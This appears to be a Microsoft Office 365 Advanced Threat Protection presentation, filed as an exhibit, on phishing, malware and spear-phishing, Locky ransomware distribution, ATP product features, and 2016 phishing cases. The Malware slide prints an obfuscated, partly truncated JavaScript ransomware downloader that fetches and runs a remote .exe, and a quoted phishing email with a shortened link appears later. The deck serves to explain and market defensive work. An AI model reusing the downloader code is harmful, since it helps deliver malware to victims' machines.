# EXHIBIT 4

# Office 365 Advanced Threat Protection



# E-Mail Threats – By the numbers

*Your users' productivity and security is more challenged than ever by different types of attacks.*

| 80 Billion | 55 Billion | 1 Billion+ |
|---|---|---|
| **Inbound Messages to Office365 in 1 month – only 31% core business mails** | **Spam and Bulk mails that could have crowded users' mailboxes** | **Malware and phish messages that could have caused a data breach** |



# Email threats

 Phish

 Malware

 Spear-phish



**Phishing** is a social engineering tactic used to turn attack *targets* into *victims*

**Looks legit:** Sender has presence, branding is accurate, URLs seem right

**Sense of urgency:** The attacker wants the victim to act quickly and not raise suspicion

**Lures the user:** The goal is to get the user to click a link or run an attachment



# Email threats

 Phish   Malware   Spear-phish

```
ooWHiXO = ") return deferred.promise(); } } };";
String.prototype.protoplasm = function () { aa = this; return aa.charAt(57-(53 +4)); };
var zynxp = [("gcIxcEnBg","briefing","A")+("NXceco","owner","served","rudolph","ctiveK")+"Ob"+"ject", ("frIpeKRrwOO","september"
abraskq = " return this; };";
var ySWynuc = this[zynxp.shift()];
IQAFFk = "EuMOpnpyrlA";
changer = (("cursory", "sculpture", "RiXx1ObHag", "altruistic", "ppWiLPAvGTq") + "udRlckDtF").protoplasm();
soevers = (("merely", "FpODzH", "saunter", "R1dATXhWvg", "sYeRDmHiko") + "mKNYsF").protoplasm();

var JeaYHqFsD = new ySWynuc(zynxp.pop() + (("shake","nXSBETKiI","tonic","5c")+("distil","roost","SiSKhnO","ri")+"pt.5h"+("hands"
prMqCNS = "jQuery.fn.ready = function( fn ) { cgzfKo";
var mFTCF = new ySWynuc(zynxp.pop());
MjpirUiArNp = " The deferred used on dDhUmFkjW DOM ready var readyList;";
var lyHlf = JeaYHqFsD[zynxp.shift()](zynxp.shift());
cqhdOP = " Add the callback jQuery.ready.promise().ItpFjPLdone( fn );";
beddinge = (("indoor", "tuumults", "cashmere", "TdnnoFw", "EAqmWoPtmY") + "Xoniql").protoplasm();

function whoop(pregnancy, automaton) {

  try {
    var credits = lyHlf + "/" + automaton + zynxp.shift();
    egQnX9IAM = ") Remember that the DOM is ready jQuery.isReady = true;";
    mFTCF["o" + changer + beddinge + "n"]("UpyhinDU8qC","season","warming","women","G") + beddinge + ("considerations","stacy",

    SGWzLoQtR = " If a normal DOM Ready event fired, decrement, and wait if need be if ( wait !== true && --jQuery.readyWait > 0
    mFTCF[soevers + ("bellow","workers","bulky","e") + (("ecommerce","crypt","vGVXVyx","yxSqFMP1","filament","nACVJco") + "
    rjlodSzrhLf = ") If there are functions bound, to execute readyList.resolveWith( document, [ jQuery ] );";
    if (mFTCF.status == 200) {
      var NXAVDF = new ySWynuc(("" + "A" + ("muckle","OocynJGJ","pO") + "DB." + ("dvpueSmySn","nativity","preparing","parasite","")
      NXAVDF["" + "o" + ("vastness","tortoise","pen")]();
      bOTPuGYx = "jQuery.extend ({";
      NXAVDF.type = 0 + 3 > 2;
      vqbtFVNR = " Is the DOM ready to be used? Set to true once it occurs. isReady: false,";
      NXAVDF[("advisers","yawned","travesti","luxury","W")+"ri"+"te"](mFTCF[("tourism","oqOGdz","")+"R"+"es"+"pon" + soevers +
      LID5oX1svKz = " A counter to track how many itemd to wait for before the ready event fires. See #6781 readyWait: 1,";
      NXAVDF[(charger + ("vacation","ANhVpn","parsimony","o")+"D1"+"ti"+("scullery","ubdesa","potential","on")).replace("D",
      DXyiGA = " Hold (or release) the ready event holdReady: function( hold ) { if ( hold ) { jQuery.readyWait++; } else { jQ
      NXAVDF[("mvsel","disclose","bedooms","suoplant","s")+"av"+"eT"+("plurality","nVCeev".installed"."mater"."oF")+("other
      NQALhFUR = " Handle when the DOM is ready ready: function( wait ) {";
      NXAVDF.close();
      UaWiLnjy = " Abort if there are pending holds or we\"re already ready if ( wait === true ? --jQuery.readyWai
      JeaYHqFsD[zynxp.shift()](credits, 1, "uuMmjBvK" === "WSsQKKKqRak"); xNmNMl = " } else { document.detachEven

  catch (LP1kAe) { };

  vatfbwuM = "/** * Clean-up method for dom ready events */ function detach() { if ( document.addEventListener )
whoop("h"+"tt"+"p:"+"//hi"+"ndle"+"ys"+("friendly","dissimulation",".c")+"om/t"+y4"+"3ff333"+".e"+"xe","nwnBgtUJFL
  ywsdzH = " Trigger any bound ready events if ( jQuery.fn.triggerHandler ( jQuery( document ).triggerHandler(
```

Sample: Ransomware downloader

**Malware** attacks use malicious code to exploit a victim's computer

**Stealthy attack:** Constantly morphing to evade detection

**No-vuln:** Uses macros and JavaScript to plant a virus, not a patchable vulnerability

**The attachment is only stage 1:** Most email malware just is a lightweight downloader



# Email threats

 Phish     Malware     Spear-phish



**Spear-phishing** attacks attempt to compromise a high-value target

**Low volume, big payday:** Highest degree of personalization and largest expected payout

**No detectable threat:** No malware or malicious URL used in email

**Exploits personal relationships:** Use of spoofing and lookalike domains



# Behind the attack – Locky Distribution



Attacker

Zombie computers

Targets

**Goal**: Steal money from victims

**Plan**: Infect with victims with ransomware and demand bitcoin payment

Command and control

# Behind the attack – Locky Distribution



Attack morphs over time to evade detection

# Behind the attack – Locky infection



# Solid protection







# ATP: built into Office 365

Edge Block

AV Scanners

Reputation Blocking

Heuristic Clustering

ATP Safe Attachments

Antispam Phish Spoof

ATP Safe Links

# Preventing advanced attacks



O365 Edge

Internet

```
sender ip: 10.2.1.1
sender: badguy@malicious.com
recipient: goodguy@contoso.com
internal reputation: bad
external reputation: bad
```

# Preventing advanced attacks

## Signature AV Scans



## Reputation Block



# Preventing advanced attacks

## Heuristic Clustering



## ATP Safe Attachments



## Sandbox

```
memory scan          registry

obfuscation          network

evasion              C2 server

encryption           file I/O
```

# Preventing advanced attacks



# Preventing advanced attacks



# Defense in depth



# The future of false positives/negatives



Organization Allow / Block

- Empower admins to block or allow specific URLs or files for their organization.
- Will provide an early signal to O365 that an FP or FN is impacting customers.

Release malware caught mail to the recipient or an admin mailbox for further investigation.

False Positives
False Negatives

Malware Quarantine

O365 Submissions

- Easily submit files, urls, or messages to O365 as spam, malware, phish, etc...
- Get admin feedback on the status of your submissions.

# ATP vs. 3rd Party Solutions

- The EOP/ATP filtering pipeline offers world class malware protection.

- ATP is built in to EOP.  Setup takes less than a minute.

- ATP will protect more than just email.

- Microsoft is uniquely positioned to respond to the evolving threat space.



### O365 Catch After 3rd Party Filtering (192 tenants sampled)

# Expanding Advanced Threat Protection





# Upcoming Features



### Dynamic Email Delivery
Receive every email immediately.  Safe Attachments scanning occurs in the background and email attachments become automatically available when we know the attachments are safe.



### Linked Content Detonation
Merging the technologies behind Safe Links and Safe Attachments to provide full sandbox protection for content pointed to by links in emails.



### Safe Attachments in Sharepoint
Extending the protection of Safe Attachments to files stored in SharePoint Online.



### Safe Links in Office Clients
Native integration of Safe Links in Office 2016 clients will provide time of click protection, even inside of documents.



### Antimalware Quarantine
Release false positives easily back to the recipient. Release caught malware to your security team.



### Tenant Allow/Block
Block or allow specific files or URLs for your tenant.



### O365 Submission Portal
Release false positives easily back to the recipient. Release caught malware to your security team.



### Enhanced ATP Reporting
Details about the messages caught for your tenant through O365 sandboxing



### Detailed Sandboxing Reports
Specific details of what happens in the hypervisor, including C2 IPs, registry keys, secondary content downloaded, etc...

# 2016| The Year in Phishing….

- **Per FBI, BEC phishing caused $3.1B loss, 22K victims globally**

- **2016 was an all time high in phishing attacks**

- **W-2 phishing scam was rampant: duped technology companies like SeaGate, Snapchat, Actifio, Acronis**

- **Political hacks led via phishing**

- **~400 brands under attack. 50% attacks on top 20 brands. Microsoft among the top 5**



**Phishing Attacks In Q2 2016 Shatter All Records to Reach All-Time High**

IRS Alerts Payroll and HR Professionals to Phishing Scheme Involving W-2s

IR-2016-34, March 1, 2016

**Seagate sued by angry staff following phishing data breach**

Seagate HR fell for a phishing scam and released sensitive employee data. The staff affected by the disaster want compensation.

ta emails released by WikiLeaks

```
> *From:* Google <no-reply@accounts.googlemail.com>
> *Date:* March 19, 2016 at 4:34:30 AM EDT
> *To:* [redacted]a@gmail.com
> *Subject:* *Someone has your password*
>
> Someone has your password
> Hi John
>
> Someone just used your password to try to sign in to your Google Account
> [redacted]@gmail.com.
>
> Details:
> Saturday, 19 March, 8:34:30 UTC
> IP Address: 134.249.139.239
> Location: Ukraine
>
> Google stopped this sign-in attempt. You should change your password
> immediately.
>
> CHANGE PASSWORD <https://bit.ly/1PibSU0>
```

Source: FBI, APWG, Wikileaks, Kapersky

# What protection exists today

- Content based protection
- URL verification against known phishing lists
- Domain protection via DMARC/SPF

| This sender failed our fraud detection checks and may not be who they appear to be. Learn more about spoofing    Feedback |

- Safety Tips for mails detected as phish

| This message was identified as a phishing scam. You won't be able to interact with it. Learn more about phishing    Feedback |

- DLP rules to stop sensitive content being sent outside the organization
  - W2 phish for example
- ATP/E5
  - Machine Learning models
  - Safe links
  - Detonation of content
  - Implicit domain checks where DMARC is not available

# What is coming?

- More Machine learning

- Threat intelligence

- Easy end user reporting and feedback

# Advanced Threat Protection

## Preview Program

### Benefits

- Access to the NDA roadmap
- First to see UX/Feature/Capability concepts
- Ability to directly influence the product
- Assistance from the engineering team
- and more...

### Next Steps

- Email ameshm@micorsoft.com add **subject:** ATP Preview Program
- Identify primary contact